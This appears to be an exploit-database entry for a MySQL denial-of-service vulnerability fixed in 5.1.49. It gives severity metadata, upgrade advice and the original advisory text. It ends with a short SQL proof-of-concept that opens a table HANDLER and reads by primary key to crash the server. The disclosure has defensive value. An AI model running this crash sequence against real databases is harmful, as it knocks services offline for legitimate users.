header-logo
Suggest Exploit
vendor:
MySQL
by:
Unknown
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: MySQL
Affected Version From: MySQL versions prior to 5.1.49
Affected Version To: MySQL 5.1.48 and earlier
Patch Exists: YES
Related CWE: Unknown
CPE: mysql
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Denial-of-Service Vulnerability in MySQL

An attacker can exploit this issue to crash the database, denying access to legitimate users.

Mitigation:

Upgrade to MySQL version 5.1.49 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42633/info

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the database, denying access to legitimate users.

This issue affects versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it.. 

--disable_warnings
DROP TABLE IF EXISTS t1;
--enable_warnings
CREATE TABLE t1  ( pk INT , PRIMARY KEY (pk));
HANDLER t1 OPEN AS handler_a;
HANDLER handler_a READ FIRST;
HANDLER handler_a READ `PRIMARY` NEXT;

DROP TABLE t1;